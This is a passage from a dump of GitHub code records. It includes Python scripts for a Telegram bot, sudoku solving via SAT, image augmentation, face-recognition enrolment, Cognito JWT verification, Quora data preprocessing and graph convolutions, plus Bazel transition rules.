settings[chat_id]\n\n print('Processsing %s on %s' % (update.message.text, str(chat_id)) )\n message_content = update.message.text\n if message_content[0] != ['/']:\n message_queue = messages[chat_id]\n # Do not put messages here that are commands for other bots\n message_queue.appendleft(update.message)\n\n ninjable_content = _get_ninjable_content(message_content)\n\n if chat_setting['autoninja'] and ninjable_content:\n reply_message_content = TRIGGERS[ninjable_content]\n update.message.reply_text(\n '{} {}'.format(reply_message_content, update.message.from_user.first_name))\n\n\nif __name__=='__main__':\n updater = Updater(TOKEN)\n\n updater.dispatcher.add_handler(CommandHandler('helloninja', hello))\n updater.dispatcher.add_handler(CommandHandler('ninja', ninja))\n updater.dispatcher.add_handler(CommandHandler('autoninja', autoninja))\n updater.dispatcher.add_handler(CommandHandler('ninjasettings', ninjasettings))\n updater.dispatcher.add_handler(MessageHandler(None,callback=process_message))\n\n updater.start_polling()\n updater.idle()\n","repo_name":"C-CodigoLibre/femininja","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3825,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32283765311","text":"import logging\n\n# 设置日志输出样式\nlogging.basicConfig(\n level=logging.INFO,\n format='levelname:%(levelname)s filename: %(filename)s '\n 'outputNumber: [%(lineno)d] thread: %(threadName)s output msg: %(message)s'\n ' - %(asctime)s ',\n datefmt='[%d/%b/%Y %:H%:M%S]'\n)\n\nlogger = logging.getLogger(__name__)\n\nif __name__ == '__main__':\n logger.info('this is a info log')\n logger.info('this is a info log 1')\n logger.error('this is a error errorlog')\n logger.error('this is a error errorlog 1')","repo_name":"focusdroid-python/flask-demo","sub_path":"scrapy/beforeSpider/test/log_b.py","file_name":"log_b.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33551626778","text":"#!/usr/bin/env python3\n# -*-coding:utf-8 -*-\n# __author__:Jonathan\n# email:nining1314@gmail.com\nfrom 
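# Editor's fix sketch for process_message() in the femininja main.py above:
# `message_content[0] != ['/']` compares a single character against a list,
# which is always True, so command messages are never kept out of the queue.
# Comparing against the character itself (or using startswith) is the intent:
def is_regular_message(message_content):
    """True for ordinary chat text, False for bot commands such as '/ninja'."""
    return not message_content.startswith('/')

assert is_regular_message('hola ninja')
assert not is_regular_message('/ninja')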
multiprocessing import Pool\n\n\ndef work(n):\n return n ** 2\n\nif __name__ == '__main__':\n pool = Pool(6)\n res_l = []\n for i in range(6):\n res = pool.apply_async(work, args=(i, ))\n res_l.append(res)\n\n for item in res_l:\n print(item.get()) # 取得异步执行的结果\n \"\"\"\n 应用场景:爬虫,线程池去爬网页,爬下来的内容交给回调函数去分析处理\n \"\"\"\n","repo_name":"ni-ning/LearnPython","sub_path":"10Process/进程池/进程池之回调函数.py","file_name":"进程池之回调函数.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"648038954","text":"from dpll import *\nfrom sudoku import *\n\n\ndef resitev(rezult):\n\t\"\"\"Iz slovarja spremenljivk, ki jih uporablja pretvorba na SAT, \n\tta funkcija izlusci slovar vrednosti zasedenih polj. \"\"\"\n\t\n\tpolja = {}\n\tfor spr in rezult:\n\t\tif rezult[spr]==T():\n\t\t\ttrojica = tuple(int(i) for i in spr.split(\",\"))\n\t\t\tpolja[(trojica[0],trojica[1])] = str(trojica[2])\n\treturn polja\n\n\t\n\ndef narisi(polja):\n\t\"\"\"Narise sudoku z danimi izpolnjenimi polji.\"\"\"\n\n\tfor vr in range(1, 10):\n\t\tif vr==1 or vr==4 or vr==7:\n\t\t\tprint(\"\\t _________________________\")\n\t\tvrstica = [polja[(vr,st)] for st in range(1, 10)]\n\t\tvrstica = \"\\t | \" + \" \".join(vrstica[:3]) + \" | \" + \" \".join(vrstica[3:6]) + \" | \" + \" \".join(vrstica[6:]) + \" | \"\n\t\tprint(vrstica)\n\tprint(\"\\t _________________________\\n\\n\")\n\n\n\ndef preberi(fajlSprimeri):\n\t\"\"\"Prebere fajl s primeri sudokujev. Vrne seznam trojic danih polj.\"\"\"\n\n\tfile = open(fajlSprimeri)\t\n\tpolja = [[],[],[]]\n\n\tfor vrstica,line in enumerate(file):\n\t\tif vrstica<14 or vrstica%2==1:\n\t\t\tcontinue\n\t\telif vrstica<37 and vrstica>31:\n\t\t\tcontinue\n\t\telif vrstica>55 and vrstica<61 :\n\t\t\tcontinue\n\t\telif vrstica>78:\n\t\t\tbreak\n\t\telse:\n\t\t\tif vrstica<31:\n\t\t\t\tvrstSud = (vrstica-12)//2\n\t\t\t\tP = 0\n\t\t\telif vrstica<55:\n\t\t\t\tvrstSud = (vrstica-36)//2\n\t\t\t\tP = 1\n\t\t\telse:\n\t\t\t\tvrstSud = (vrstica-60)//2\n\t\t\t\tP = 2\n\n\t\t\tl = [k.strip(\" \") for k in line.split(\"|\")[1:-1]]\n\t\t\tL = len(l) #=9, ce gre vse po planu... :|\n\t\t\tp = [(vrstSud,i,int(l[i])) for i in range(L) if l[i]!=\"\"]\n\t\t\tpolja[P].extend(p)\n\n\tfile.close()\n\treturn polja\n\t\t\n\n\n\n\ndef preveri():\n\ti = 0\n\tprimeri = preberi('primeri.txt')\n\tfor polja in primeri:\n\t\ti += 1\n\t\tprint(\" Sudoku št. {0}\".format(i))\n\t\tprint(\"=================\") \n\t\tformula = sudoku(polja).cnf()\n\t\tresljivo = dpll(formula)\n\t\tif resljivo==0:\n\t\t\tprint(\"Ta sudoku ni rešljiv. \\n\")\n\t\telse:\n\t\t\tpolja2 = resitev(resljivo)\n\t\t\tprint(\"Sudoku je možno rešiti. \\n\\tRešitev: \\n\")\n\t\t\tnarisi(polja2)\n\t\tprint(\"\\n\\n\")\n\n\t\n\n######\n\nY = input(\"\\nProsim, vpiši znana polja v datoteko primeri.txt. Ko končaš jo shrani, zapri in pritisni enter. 
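# Editor's sketch for the pool example above: its docstring describes handing
# results to a callback (the crawler use case), and apply_async accepts a
# `callback` argument that the pool invokes with each result, removing the
# explicit .get() loop. Note the callbacks fire in completion order, not
# necessarily input order.
from multiprocessing import Pool

def work(n):
    return n ** 2

def handle_result(value):
    print('processed:', value)

if __name__ == '__main__':
    with Pool(6) as pool:
        for i in range(6):
            pool.apply_async(work, args=(i,), callback=handle_result)
        pool.close()
        pool.join()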
\\n\")\npreveri()\n","repo_name":"EvaBr/LVRSAT","sub_path":"resljivostSudoku.py","file_name":"resljivostSudoku.py","file_ext":"py","file_size_in_byte":2048,"program_lang":"python","lang":"sl","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8506954660","text":"'''Perform transforms on both PIL image and object boxes.'''\nimport math\nimport random\n\nimport torch\nimport torchvision.transforms as transforms\n\nfrom PIL import Image, ImageDraw\n\n\ndef resize(img, boxes, size, max_size=1000):\n '''Resize the input PIL image to the given size.\n\n Args:\n img: (PIL.Image) image to be resized.\n boxes: (tensor) object boxes, sized [#ojb,4].\n size: (tuple or int)\n - if is tuple, resize image to the size.\n - if is int, resize the shorter side to the size while maintaining the aspect ratio.\n max_size: (int) when size is int, limit the image longer size to max_size.\n This is essential to limit the usage of GPU memory.\n Returns:\n img: (PIL.Image) resized image.\n boxes: (tensor) resized boxes.\n '''\n w, h = img.size\n if isinstance(size, int):\n size_min = min(w,h)\n size_max = max(w,h)\n sw = sh = float(size) / size_min\n if sw * size_max > max_size:\n sw = sh = float(max_size) / size_max\n ow = int(w * sw + 0.5)\n oh = int(h * sh + 0.5)\n else:\n ow, oh = size\n sw = float(ow) / w\n sh = float(oh) / h\n return img.resize((ow,oh), Image.BILINEAR), \\\n boxes*torch.Tensor([sw,sh,sw,sh])\n\ndef random_crop(img, boxes):\n '''Crop the given PIL image to a random size and aspect ratio.\n\n A crop of random size of (0.08 to 1.0) of the original size and a random\n aspect ratio of 3/4 to 4/3 of the original aspect ratio is made.\n\n Args:\n img: (PIL.Image) image to be cropped.\n boxes: (tensor) object boxes, sized [#ojb,4].\n\n Returns:\n img: (PIL.Image) randomly cropped image.\n boxes: (tensor) randomly cropped boxes.\n '''\n success = False\n for attempt in range(10):\n area = img.size[0] * img.size[1]\n target_area = random.uniform(0.56, 1.0) * area\n aspect_ratio = random.uniform(3. / 4, 4. 
/ 3)\n\n w = int(round(math.sqrt(target_area * aspect_ratio)))\n h = int(round(math.sqrt(target_area / aspect_ratio)))\n\n if random.random() < 0.5:\n w, h = h, w\n\n if w <= img.size[0] and h <= img.size[1]:\n x = random.randint(0, img.size[0] - w)\n y = random.randint(0, img.size[1] - h)\n success = True\n break\n\n # Fallback\n if not success:\n w = h = min(img.size[0], img.size[1])\n x = (img.size[0] - w) // 2\n y = (img.size[1] - h) // 2\n\n img = img.crop((x, y, x+w, y+h))\n boxes -= torch.Tensor([x,y,x,y])\n boxes[:,0::2].clamp_(min=0, max=w-1)\n boxes[:,1::2].clamp_(min=0, max=h-1)\n return img, boxes\n\ndef center_crop(img, boxes, size):\n '''Crops the given PIL Image at the center.\n\n Args:\n img: (PIL.Image) image to be cropped.\n boxes: (tensor) object boxes, sized [#ojb,4].\n size (tuple): desired output size of (w,h).\n\n Returns:\n img: (PIL.Image) center cropped image.\n boxes: (tensor) center cropped boxes.\n '''\n w, h = img.size\n ow, oh = size\n i = int(round((h - oh) / 2.))\n j = int(round((w - ow) / 2.))\n img = img.crop((j, i, j+ow, i+oh))\n boxes -= torch.Tensor([j,i,j,i])\n boxes[:,0::2].clamp_(min=0, max=ow-1)\n boxes[:,1::2].clamp_(min=0, max=oh-1)\n return img, boxes\n\ndef random_flip(img, boxes):\n '''Randomly flip the given PIL Image.\n\n Args:\n img: (PIL Image) image to be flipped.\n boxes: (tensor) object boxes, sized [#ojb,4].\n\n Returns:\n img: (PIL.Image) randomly flipped image.\n boxes: (tensor) randomly flipped boxes.\n '''\n if random.random() < 0.5:\n img = img.transpose(Image.FLIP_LEFT_RIGHT)\n w = img.width\n xmin = w - boxes[:,2]\n xmax = w - boxes[:,0]\n boxes[:,0] = xmin\n boxes[:,2] = xmax\n return img, boxes\n\ndef draw(img, boxes):\n draw = ImageDraw.Draw(img)\n for box in boxes:\n draw.rectangle(list(box), outline='red')\n img.show()\n\n\ndef test():\n img = Image.open('./image/000001.jpg')\n boxes = torch.Tensor([[48, 240, 195, 371], [8, 12, 352, 498]])\n img, boxes = random_crop(img, boxes)\n print(img.size)\n draw(img, boxes)\n\n# test()\n","repo_name":"kuangliu/pytorch-retinanet","sub_path":"transform.py","file_name":"transform.py","file_ext":"py","file_size_in_byte":4190,"program_lang":"python","lang":"en","doc_type":"code","stars":989,"dataset":"github-code","pt":"72"} +{"seq_id":"74683028392","text":"import json\nimport sqlite3\nimport cv2\nimport numpy as np\nfrom dsClass.align_custom import AlignCustom\nfrom dsClass.face_feature import FaceFeature\nfrom dsClass.mtcnn_detect import MTCNNDetect\nfrom dsClass.tf_graph import FaceRecGraph\n\ndef add_new_student(student_name, student_index_number):\n # Connect to SQLite database\n con = sqlite3.connect(\"../attendance_db.sqlite\")\n cur = con.cursor()\n\n # Create instances of various classes\n face_rec_graph = FaceRecGraph() # Face recognition graph\n aligner = AlignCustom() # Face alignment object\n extracted_face_feature = FaceFeature(face_rec_graph) # Face feature extractor object\n face_detect = MTCNNDetect(face_rec_graph, scale_factor=2) # Face detection object\n video_from_camera = cv2.VideoCapture(0) # Video capture object\n\n # Load face recognition data from a file\n face_rec_file = open(\"../dsClass/facerec_128D.txt\", \"r\")\n data_from_face_rec_file = json.loads(face_rec_file.read())\n\n # Create dictionaries to store images and corresponding face features\n student_images = {\"Left\": [], \"Right\": [], \"Center\": []}\n student_face_features = {\"Left\": [], \"Right\": [], \"Center\": []}\n\n # Extract face features from the video feed\n while True:\n _, frame = 
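# Editor's note on transform.py above: the crop helpers update `boxes` in
# place (`boxes -= ...` and the clamp_ calls), so a caller that wants to keep
# the original coordinates should hand in a clone. A minimal sketch; the box
# values are illustrative assumptions.
import torch

def crop_keeping_original(img, boxes, crop_fn):
    # clone() shields the caller's tensor from the in-place updates above.
    return crop_fn(img, boxes.clone())

boxes = torch.Tensor([[48, 240, 195, 371]])
# cropped_img, cropped_boxes = crop_keeping_original(img, boxes, random_crop)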
video_from_camera.read()\n rects, landmarks = face_detect.detect_face(frame, 80)\n for i, rect in enumerate(rects):\n aligned_frame, pos = aligner.align(160, frame, landmarks[i])\n if len(aligned_frame) == 160 and len(aligned_frame[0]) == 160:\n # Store aligned frames in a dictionary based on their position\n student_images[pos].append(aligned_frame)\n cv2.imshow(\"Recording Face, Pres 'q' to save and close window\", aligned_frame)\n key = cv2.waitKey(1) & 0xFF\n if key == 30 or key == ord(\"q\"):\n break\n\n # Save the name of the student to the student table in the database\n cur.execute(\"INSERT INTO student(name, index_number) VALUES(?, ?)\", (student_name, student_index_number),)\n con.commit()\n\n # Compute the mean of the extracted features for each position and store them in a dictionary\n for pos in student_images:\n student_face_features[pos] = [np.mean(extracted_face_feature.get_features(student_images[pos]), axis=0).tolist()]\n\n # Append the new face feature dictionary to the loaded data from the file\n data_from_face_rec_file[student_name] = student_face_features\n\n # Overwrite the face recognition file with the updated data\n face_rec_file = open(\"../dsClass/facerec_128D.txt\", \"w\")\n face_rec_file.write(json.dumps(data_from_face_rec_file))\n\n return True\n","repo_name":"Brianchib/attendance_project","sub_path":"src/add_new_student.py","file_name":"add_new_student.py","file_ext":"py","file_size_in_byte":2667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15034522109","text":"N,M = map(int,input().split())\r\nMod = 10**9+7\r\nfrom collections import defaultdict\r\nF = [0]*N\r\nfor i in range(N):\r\n F[i] = int(input())\r\nl = [0]*N\r\nused = [False]*(M+1)\r\nj = -1\r\nfor i in range(N):\r\n while True:\r\n if j == N-1:\r\n break\r\n j += 1\r\n if used[F[j]]:\r\n j -= 1\r\n break\r\n used[F[j]] = True\r\n l[i] = j-i+1\r\n used[F[i]] = False\r\nl.reverse()\r\ndp = [0]*N\r\ncdp = [0]*(N+1)\r\ndp[0] = 1\r\ncdp[0] = 1\r\nfor i in range(1,N):\r\n if i-1-l[i] < -1:\r\n dp[i] = cdp[i-1]+1\r\n else:\r\n dp[i] = cdp[i-1]-cdp[i-l[i]-1]\r\n cdp[i] = cdp[i-1]+dp[i]\r\n dp[i] %= Mod\r\n cdp[i] %= Mod\r\nprint(dp[N-1])","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/AtCoder/abc017/D/3553073.py","file_name":"3553073.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"15492212244","text":"from time import time\nfrom rest_framework import exceptions\nfrom rest_framework.authentication import BaseAuthentication, get_authorization_header\nfrom django.utils.translation import gettext_lazy as _\n\nfrom django.contrib.auth.models import AnonymousUser\n\nimport os\nfrom jose import jwk, jwt\nfrom jose.utils import base64url_decode\n\n\n# We're using this to bypass the Django user model since we're using Cognito\nclass CognitoUser(AnonymousUser):\n @property\n def is_authenticated(self):\n return True\n\n\nclass CognitoTokenAuthentication(BaseAuthentication):\n keys = [\n {\n \"alg\": \"RS256\",\n \"e\": \"AQAB\",\n \"kid\": \"E3e3Qo3bI+kX3hIaWxqXSxkbt+t1+2CE5oiIckNlOA0=\",\n \"kty\": \"RSA\",\n \"n\": 
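# Editor's sketch for add_new_student.py above: the camera handle, the OpenCV
# preview window, and the facerec file objects are opened but never released.
# The cleanup that would normally follow the capture loop (variable names
# match the function above):
import cv2

def release_capture(video_from_camera):
    video_from_camera.release()  # free the camera device
    cv2.destroyAllWindows()      # close the preview window

# The file handles are also safer as context managers:
# with open("../dsClass/facerec_128D.txt", "w") as face_rec_file:
#     face_rec_file.write(json.dumps(data_from_face_rec_file))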
\"vGCZfKCogqCKmMXnOq6kLoGIE64UCHQVd6k2J8VINLkm2jnOI3BU5u1Q8Csl5NvSsNzWTuKQbvHmLz7q21SabjKD_pvKxRgt4lFGJAbadIDbdqsGUHzQHAaBJaVUhm32eMapTECbicIQBGCicsQ8XEUu7q2NHiy3UrU7gbvqjf7z9DV9XaTFlIU4S32Jn35BouLshesmFcdCsnxA7m3Ra4psg7ZiZZNrPZTm-rimdqvH5RNqPhs_MzSJ7g0KpEJd2WyCBzObLo_WIBGVo8dlIRJXRr4KvcNvwXZo2oTqQ17kxz1C1HqYFH4sr79UTPkGh0B_NzhaQ_a86ks2dSYjDQ\",\n \"use\": \"sig\",\n },\n {\n \"alg\": \"RS256\",\n \"e\": \"AQAB\",\n \"kid\": \"Eb6mi7UDnWUNFJMbku8/oT5S1oB6AVsXRWY5+J8bnAE=\",\n \"kty\": \"RSA\",\n \"n\": \"nfEWkRZk1VlWJfp-BEvHIDKd7vj0ImJ_MYNj3gRQAUEfHo0f5AV7oC3x4HWD5nYzMcQlyURYQsqpViekTWBcG3vef-6OYzsdQS_Pw4-eEZ-PHftMeBd6-6r-pcmXEZ4gPbA0sk4baLoF9fBOKohdQTPNfbQpuEgBsHHOmWJ-VZrQ3WOHLEPhFS_d9ewVGfUgDLNxvy0zXPqVa1555PoIjjjwDXFHuHqhMj5Or12pjMnymhLwELxGnnRJjyxzKw75z6FNwWqlQFupswGUNjqs1swfxkZsUM10c4qgSFk1orjJjv9CIjH_25QuRRZlm0boqbcSkCchs0RCbW-BPrkEEw\",\n \"use\": \"sig\",\n },\n ]\n\n keyword = \"Token\"\n\n def authenticate(self, request):\n auth = get_authorization_header(request).split()\n\n if len(auth) == 1:\n msg = _(\"Invalid token header. No credentials provided.\")\n raise exceptions.AuthenticationFailed(msg)\n elif len(auth) > 2:\n msg = _(\"Invalid token header. Token string should not contain spaces.\")\n raise exceptions.AuthenticationFailed(msg)\n\n if not auth or auth[0].lower() != self.keyword.lower().encode():\n return None\n\n token = auth[1].decode()\n headers = jwt.get_unverified_headers(token)\n kid = headers[\"kid\"]\n\n key_index = -1\n for i in range(len(self.keys)):\n if kid == self.keys[i][\"kid\"]:\n key_index = i\n break\n\n if key_index == -1:\n raise exceptions.AuthenticationFailed()\n\n public_key = jwk.construct(self.keys[key_index])\n message, encrypted_signature = str(token).rsplit(\".\", 1)\n decoded_signature = base64url_decode(encrypted_signature.encode(\"utf-8\"))\n\n if not public_key.verify(message.encode(\"utf-8\"), decoded_signature):\n raise exceptions.AuthenticationFailed()\n\n claims = jwt.get_unverified_claims(token)\n\n if time() > claims[\"exp\"]:\n raise exceptions.AuthenticationFailed()\n\n return (CognitoUser(), None)\n","repo_name":"parinzee/BCIS-app","sub_path":"backend/backend/api/authentication.py","file_name":"authentication.py","file_ext":"py","file_size_in_byte":3104,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"35545758834","text":"__author__ = \"Kyle Vitautas Lopin\"\n\n# standard libraries\nimport time\nimport tkinter as tk\n\n# local files\nfrom usb_comm import SerialComm\n\n\nclass Monitor(tk.Tk):\n def __init__(self):\n tk.Tk.__init__(self)\n self.device = SerialComm()\n self.entry = tk.Entry(self)\n self.entry.pack()\n tk.Button(self, text=\"Send message\", command=self.send_message).pack()\n self.poll_for_input()\n\n def send_message(self):\n self.device.write_data(self.entry.get())\n\n def poll_for_input(self):\n self.after(10, self.poll_for_input)\n data = self.device.poll_for_data()\n if data:\n print(f\"Got data: {data}\")\n print(f\"len data: {len(data)}\")\n\n\nif __name__ == '__main__':\n app = Monitor()\n print(\"check1\")\n app.geometry(\"400x400\")\n app.mainloop()\n","repo_name":"KyleLopin/Potentiostat_GUI","sub_path":"tools/serial_monitor.py","file_name":"serial_monitor.py","file_ext":"py","file_size_in_byte":832,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"72"} +{"seq_id":"17171052098","text":"with open(\"barak ovama.txt\", mode=\"r\") as b_file:\r\n for line in b_file.readlines():\r\n 
print(line.strip())\r\n\r\nprint(\"shahinur \",end=\"\")\r\nprint(\"finised\")\r\nwith open(\"barak ovama.txt\", mode=\"r\") as b_file:\r\n for line in b_file.readlines():\r\n words=line.strip().split(\" \")#strip-string return kore\r\n print(words)\r\nprint(\"word finised\")\r\n\r\nwith open(\"barak ovama.txt\", mode=\"r\") as b_file:\r\n worde_all=[]\r\n for line in b_file.readlines():\r\n words=line.strip().split()\r\n worde_all += words\r\n unique_word = set(worde_all)\r\n print(worde_all)\r\n print(len(worde_all))\r\n print(unique_word)\r\n print(len(unique_word))\r\n\r\n with open(\"unique_word.txt\",mode=\"w\") as write_file:\r\n for item in unique_word:\r\n write_file.write(item)\r\n write_file.write(\" \\n\")\r\n\r\nprint(\"finised\")","repo_name":"SWE-Shahinur/Python-Googler_Zulkarnine_Mahmud","sub_path":"FileIO.py","file_name":"FileIO.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8594167149","text":"import tkinter.tix\n\n\ndef a():\n a, b, c, d = map(int, input().split())\n ans = 'Takahashi'\n if a < c:\n return print(ans)\n elif a == c:\n if b <= d:\n return print(ans)\n else:\n return print('Aoki')\n else:\n return print('Aoki')\n\ndef b():\n _ = input()\n li = list(map(int, input().split()))\n li.sort()\n nums = list(range(0,2001))\n for i in li:\n if i in nums:\n nums.remove(i)\n return print(nums[0])\n\ndef rec(ans:list, a_li:list, b_li:list, n, i, k):\n if ans:\n ans.append(a_li[0])\n ans = rec(ans, a_li, b_li, n, i + 1, k)\n if len(ans) == n:\n return ans\n else:\n ans.pop()\n ans.append(b_li[0])\n ans = rec(ans, a_li, b_li, n, i + 1, k)\n if len(ans) == n:\n return ans\n return []\n if abs(ans[-1] - a_li[i]) <= k:\n ans.append(a_li[i])\n elif abs(ans[-1] - b_li[i]) <= k:\n ans.append(b_li[i])\n else:\n ans.pop()\n i -= 1\n return rec(ans, a_li, b_li, n, i, k)\n\ndef c():\n n, k = map(int, input().split())\n a_li = list(map(int, input().split()))\n b_li = list(map(int, input().split()))\n ans = []\n i = 0\n t_li = [0] * n # 1 -> a 2-> b 0 -> no answer\n while i < n:\n print(f\"ans:{ans} tli:{t_li} i:{i}\")\n if not ans:\n if t_li[0] == 0:\n ans.append(a_li[i])\n elif t_li[0] == 1:\n ans.append(b_li[i])\n else:\n return print('No')\n t_li[i] += 1\n i += 1\n continue\n if t_li[i] == 0 and abs(ans[i-1] - a_li[i]) <= k:\n ans.append(a_li[i])\n elif t_li[i] == 1 and abs(ans[i-1] - b_li[i]) <= k:\n ans.append(b_li[i])\n elif t_li[i] < 2:\n t_li[i] += 1\n continue\n else:\n ans.pop()\n i -= 1\n\n i += 1\n print(t_li)\n print(ans)\n return print('Yes')\n\nif __name__ == '__main__':\n c()","repo_name":"RyutaSato/abc_log","sub_path":"245.py","file_name":"245.py","file_ext":"py","file_size_in_byte":2040,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"564280519","text":"import pandas as pd\n\nINPUT_DATA = './data/quora_duplicate_questions.tsv'\nFILTERED_DATA = './data/filtered.tsv' ################# Name of final filtered dataset #################\nq1_col_name = 'question1'\nq2_col_name = 'question2'\n\n'''\n////////////////////////////\n Uncomment 13-30 for creating filtered.tsv\n////////////////////////////\n'''\ndf = pd.read_csv(INPUT_DATA,index_col=0,sep='\\t')\nprint(df.tail())\nprint('\\nDropping na...\\n')\ndf.dropna(inplace=True)\nprint(df.tail())\n\ndef isAscii(s):\n # print(s)\n try:\n s[q1_col_name].encode('ascii')\n s[q2_col_name].encode('ascii')\n return True\n except UnicodeEncodeError:\n return 
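# Editor's sketch for FileIO.py above: the speech file is reopened and re-read
# three times, but one pass collects both the full word list and the unique
# set. File names match the original script.
def collect_words(path="barak ovama.txt"):
    all_words = []
    with open(path, mode="r") as speech:
        for line in speech:
            all_words.extend(line.strip().split())
    return all_words, set(all_words)

# words, unique = collect_words()
# with open("unique_word.txt", mode="w") as out:
#     for word in unique:
#         out.write(word + " \n")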
False\n\ndf2 = df[df.apply(isAscii, axis=1)]\n\nimport string\ndef removePunc(s):\n return str(s).translate(str.maketrans(string.punctuation, ''.join([' ' for _ in string.punctuation]))).lower()\n\ndf2[q1_col_name] = df2[q1_col_name].apply(removePunc)\ndf2[q2_col_name] = df2[q2_col_name].apply(removePunc)\n\nprint(df2.tail())\ndf2.to_csv(FILTERED_DATA, index=False, sep='\\t')\n\n\n\n'''\n////////////////////////////\n Checking stats of filtered\n////////////////////////////\n'''\ndf2 = pd.read_csv(FILTERED_DATA, sep='\\t')\nprint(df2.dtypes)\nprint(df2.head())\n\nprint('\\n***************************')\nprint('Length: ', len(df2))\nprint('Rows with label 0: ', len(df2[df2['is_duplicate'] == 0])/len(df2))\nprint('Rows with label 1: ', len(df2[df2['is_duplicate'] == 1])/len(df2))\nprint('***************************')\n# print(df2.tail())\n\n'''\n\n***************************\nLength: 395545\nRows with label 0: 0.6289853240465687\nRows with label 1: 0.37101467595343135\n***************************\n\n'''","repo_name":"vivekanandapasam/Duplicate-Questions-on-Quora","sub_path":"preproc.py","file_name":"preproc.py","file_ext":"py","file_size_in_byte":1647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70883739112","text":"# buildifier: disable=module-docstring\n# Load the provider of the pre-made settings defined in bazel_skylib.\nload(\"@bazel_skylib//rules:common_settings.bzl\", \"BuildSettingInfo\")\n\n# Define two different transitions that both transition the `color` build setting\n# we defined in the BUILD.\ndef _blue_impl(_, __):\n return {\"//attaching_transitions_to_rules:color\": \"blue\"}\n\nblue_transition = transition(\n implementation = _blue_impl,\n inputs = [],\n outputs = [\"//attaching_transitions_to_rules:color\"],\n)\n\ndef _red_impl(_, __):\n return {\"//attaching_transitions_to_rules:color\": \"red\"}\n\nred_transition = transition(\n implementation = _red_impl,\n inputs = [],\n outputs = [\"//attaching_transitions_to_rules:color\"],\n)\n\n# buildifier: disable=print\ndef _impl(ctx):\n # Access the value of //attaching_transitions_to_rules:color for the target (blue).\n print(\"shirt color: \" + ctx.attr._color[BuildSettingInfo].value)\n\n # Access the value of //attaching_transitions_to_rules:color for the transitioned dep (red).\n # Note that you have to index by [0] here for the transitioned dep and you don't need to\n # do so below - this is because attribute-attached transitions can transition to multiple\n # new configurations so you must specify which one you want.\n print(\"sleeve color: \" + ctx.attr.sleeve[0][BuildSettingInfo].value)\n\n # Access the value of //attaching_transitions_to_rules:color for the non-transitioned dep (blue).\n print(\"back color: \" + ctx.attr.back[BuildSettingInfo].value)\n return []\n\nshirt = rule(\n implementation = _impl,\n # Attaching at rule transitions the configuration of this target and all its dependencies\n # (until it gets overwritten again, for example...)\n cfg = blue_transition,\n attrs = {\n # Attaching to an attribute transitions the configuration of this dependency (and\n # all its dependencies)\n \"sleeve\": attr.label(cfg = red_transition),\n # Here is an attribute with no transition so it will inherit its parent's --//:color\n \"back\": attr.label(),\n # Depend on the build setting so that we can access it in the rule implementation.\n # Use a private attribute (one that is prefixed with \"_\") so that target writers\n # can't override the value.\n 
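# Editor's note on preproc.py above: df2 is a slice of df, so the later
# `df2[q1_col_name] = ...` assignments can trigger pandas'
# SettingWithCopyWarning. Taking an explicit copy after filtering makes the
# intent unambiguous; a toy sketch:
import pandas as pd

df = pd.DataFrame({"question1": ["What's AI?"], "question2": ["Define AI."],
                   "is_duplicate": [1]})
filtered = df[df["is_duplicate"] == 1].copy()  # .copy() avoids the warning
filtered["question1"] = filtered["question1"].str.lower()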
\"_color\": attr.label(default = \":color\"),\n # This attribute is required to use starlark transitions. It allows\n # allowlisting usage of this rule. For more information, see\n # https://bazel.build/extending/config#user-defined-transitions\n \"_allowlist_function_transition\": attr.label(\n default = \"@bazel_tools//tools/allowlists/function_transition_allowlist\",\n ),\n },\n)\n\ndef _piece_impl(ctx):\n return ctx.attr._color[BuildSettingInfo]\n\npiece = rule(\n implementation = _piece_impl,\n attrs = {\n # Depend on the build setting so that we can access it in the rule implementation.\n # Use a private attribute (one that is prefixed with \"_\") so that target writers\n # can't override the value.\n \"_color\": attr.label(default = \":color\"),\n },\n)\n","repo_name":"bazelbuild/examples","sub_path":"configurations/attaching_transitions_to_rules/defs.bzl","file_name":"defs.bzl","file_ext":"bzl","file_size_in_byte":3125,"program_lang":"python","lang":"en","doc_type":"code","stars":741,"dataset":"github-code","pt":"72"} +{"seq_id":"19230865618","text":"import torch\nfrom torch.nn import Parameter\nfrom torch_geometric.nn.inits import uniform, ones, glorot, normal\n\n\nclass MGConv(torch.nn.Module):\n \"\"\"\n Args:\n in_channels (int): Size of each input sample.\n out_channels (int): Size of each output sample.\n K (int): Number of scales.\n bias (bool, optional): If set to :obj:`False`, the layer will not learn\n an additive bias. (default: :obj:`True`)\n \"\"\"\n\n def __init__(self, in_channels, out_channels, K, bias=True, number=0):\n super(MGConv, self).__init__()\n\n self.in_channels = in_channels\n self.out_channels = out_channels\n self.weight = Parameter(torch.Tensor(K, in_channels, out_channels))\n self.number = number\n self.K = K\n\n if bias:\n self.bias = Parameter(torch.Tensor(out_channels))\n else:\n self.register_parameter('bias', None)\n\n self.reset_parameters()\n\n def reset_parameters(self):\n # normal(self.weight, 0, 0.1)\n glorot(self.weight)\n # ones(self.weight)\n if self.bias is not None:\n ones(self.bias)\n\n def forward(self, x, Win):\n for i in range(self.weight.size(0)):\n if i == 0:\n out = torch.matmul(x, self.weight[0])\n else:\n WWW = torch.matmul(torch.t(Win[i-1]), x)\n out += torch.matmul(WWW, self.weight[i])\n\n torch.cuda.empty_cache()\n\n return out\n\n\n def __repr__(self):\n return '{}({}, {}, 